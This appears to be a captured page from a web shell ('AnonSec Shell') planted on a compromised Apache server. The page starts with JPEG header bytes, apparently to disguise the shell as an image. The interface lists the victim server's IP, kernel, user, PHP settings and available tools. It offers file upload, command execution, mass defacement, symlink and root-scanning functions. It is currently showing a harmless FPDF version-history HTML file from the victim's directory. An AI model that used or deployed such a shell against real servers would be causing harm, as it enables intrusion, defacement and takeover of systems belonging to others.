JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/merenda/milha/fpdf/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/merenda/milha/fpdf//histo.htm
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
    <title>History</title>
    <link type="text/css" rel="stylesheet" href="fpdf.css">
    <style type="text/css">
        dd {
            margin-top: 1em;
            margin-bottom: 1em
        }
    </style>
</head>
<body>
<h1>History</h1>
<dl>
    <dt><strong>v1.6</strong> (2008-08-03)</dt>
    <dd>
        - GIF image support.<br>
        - Images can now trigger page breaks.<br>
        - Possibility to have different page formats in a single document.<br>
        - Document properties (author, creator, keywords, subject and title) can now be specified in UTF-8.<br>
        - Fixed a bug: when a PNG was inserted through a URL, an error sometimes occurred.<br>
        - An automatic page break in Header() doesn't cause an infinite loop any more.<br>
        - Removed some warning messages appearing with recent PHP versions.<br>
        - Added HTTP headers to reduce problems with IE.<br>
    </dd>
    <dt><strong>v1.53</strong> (2004-12-31)</dt>
    <dd>
        - When the font subdirectory is in the same directory as fpdf.php, it is no longer necessary to define the FPDF_FONTPATH constant.<br>
        - The array $HTTP_SERVER_VARS is no longer used. It could cause trouble on PHP5-based configurations with the register_long_arrays option disabled.<br>
        - Fixed a problem related to Type1 font embedding which caused trouble to some PDF processors.<br>
        - The file name sent to the browser could not contain a space character.<br>
        - The Cell() method could not print the number 0 (you had to pass the string '0').<br>
    </dd>
    <dt><strong>v1.52</strong> (2003-12-30)</dt>
    <dd>
        - Image() now displays the image at 72 dpi if no dimension is given.<br>
        - Output() takes a string as second parameter to indicate destination.<br>
        - Open() is now called automatically by AddPage().<br>
        - Inserting remote JPEG images doesn't generate an error any longer.<br>
        - Decimal separator is forced to dot in the constructor.<br>
        - Added several encodings (Turkish, Thai, Hebrew, Ukrainian and Vietnamese).<br>
        - The last line of a right-aligned MultiCell() was not correctly aligned if it was terminated by a carriage return.<br>
        - No more error message about already sent headers when outputting the PDF to the standard output from the command line.<br>
        - The underlining was going too far for text containing characters \, ( or ).<br>
        - $HTTP_ENV_VARS has been replaced by $HTTP_SERVER_VARS.<br>
    </dd>
    <dt><strong>v1.51</strong> (2002-08-03)</dt>
    <dd>
        - Type1 font support.<br>
        - Added Baltic encoding.<br>
        - The class now works internally in points with the origin at the bottom in order to avoid two bugs occurring with Acrobat 5 :<br>&nbsp;&nbsp;* The line thickness was too
        large when printed under Windows 98 SE and ME.<br>&nbsp;&nbsp;* TrueType fonts didn't appear immediately inside the plug-in (a substitution font was used), one had to cause
        a window refresh to make them show up.<br>
        - It is no longer necessary to set the decimal separator as dot to produce valid documents.<br>
        - The clickable area in a cell was always on the left independently from the text alignment.<br>
        - JPEG images in CMYK mode appeared in inverted colors.<br>
        - Transparent PNG images in grayscale or true color mode were incorrectly handled.<br>
        - Adding new fonts now works correctly even with the magic_quotes_runtime option set to on.<br>
    </dd>
    <dt><strong>v1.5</strong> (2002-05-28)</dt>
    <dd>
        - TrueType font (AddFont()) and encoding support (Western and Eastern Europe, Cyrillic and Greek).<br>
        - Added Write() method.<br>
        - Added underlined style.<br>
        - Internal and external link support (AddLink(), SetLink(), Link()).<br>
        - Added right margin management and methods SetRightMargin(), SetTopMargin().<br>
        - Modification of SetDisplayMode() to select page layout.<br>
        - The border parameter of MultiCell() now lets choose borders to draw as Cell().<br>
        - When a document contains no page, Close() now calls AddPage() instead of causing a fatal error.<br>
    </dd>
    <dt><strong>v1.41</strong> (2002-03-13)</dt>
    <dd>
        - Fixed SetDisplayMode() which no longer worked (the PDF viewer used its default display).<br>
    </dd>
    <dt><strong>v1.4</strong> (2002-03-02)</dt>
    <dd>
        - PHP3 is no longer supported.<br>
        - Page compression (SetCompression()).<br>
        - Choice of page format and possibility to change orientation inside document.<br>
        - Added AcceptPageBreak() method.<br>
        - Ability to print the total number of pages (AliasNbPages()).<br>
        - Choice of cell borders to draw.<br>
        - New mode for Cell(): the current position can now move under the cell.<br>
        - Ability to include an image by specifying height only (width is calculated automatically).<br>
        - Fixed a bug: when a justified line triggered a page break, the footer inherited the corresponding word spacing.<br>
    </dd>
    <dt><strong>v1.31</strong> (2002-01-12)</dt>
    <dd>
        - Fixed a bug in drawing frame with MultiCell(): the last line always started from the left margin.<br>
        - Removed Expires HTTP header (gives trouble in some situations).<br>
        - Added Content-disposition HTTP header (seems to help in some situations).<br>
    </dd>
    <dt><strong>v1.3</strong> (2001-12-03)</dt>
    <dd>
        - Line break and text justification support (MultiCell()).<br>
        - Color support (SetDrawColor(), SetFillColor(), SetTextColor()). Possibility to draw filled rectangles and paint cell background.<br>
        - A cell whose width is declared null extends up to the right margin of the page.<br>
        - Line width is now retained from page to page and defaults to 0.2 mm.<br>
        - Added SetXY() method.<br>
        - Fixed a passing by reference done in a deprecated manner for PHP4.<br>
    </dd>
    <dt><strong>v1.2</strong> (2001-11-11)</dt>
    <dd>
        - Added font metric files and GetStringWidth() method.<br>
        - Centering and right-aligning text in cells.<br>
        - Display mode control (SetDisplayMode()).<br>
        - Added methods to set document properties (SetAuthor(), SetCreator(), SetKeywords(), SetSubject(), SetTitle()).<br>
        - Possibility to force PDF download by browser.<br>
        - Added SetX() and GetX() methods.<br>
        - During automatic page break, current abscissa is now retained.<br>
    </dd>
    <dt><strong>v1.11</strong> (2001-10-20)</dt>
    <dd>
        - PNG support doesn't require PHP4/zlib any more. Data are now put directly into PDF without any decompression/recompression stage.<br>
        - Image insertion now works correctly even with magic_quotes_runtime option set to on.<br>
    </dd>
    <dt><strong>v1.1</strong> (2001-10-07)</dt>
    <dd>
        - JPEG and PNG image support.<br>
    </dd>
    <dt><strong>v1.01</strong> (2001-10-03)</dt>
    <dd>
        - Fixed a bug involving page break: in case when Header() doesn't specify a font, the one from previous page was not restored and produced an incorrect document.<br>
    </dd>
    <dt><strong>v1.0</strong> (2001-09-17)</dt>
    <dd>
        - First version.<br>
    </dd>
</dl>
</body>
</html>

Anon7 - 2022
AnonSec Team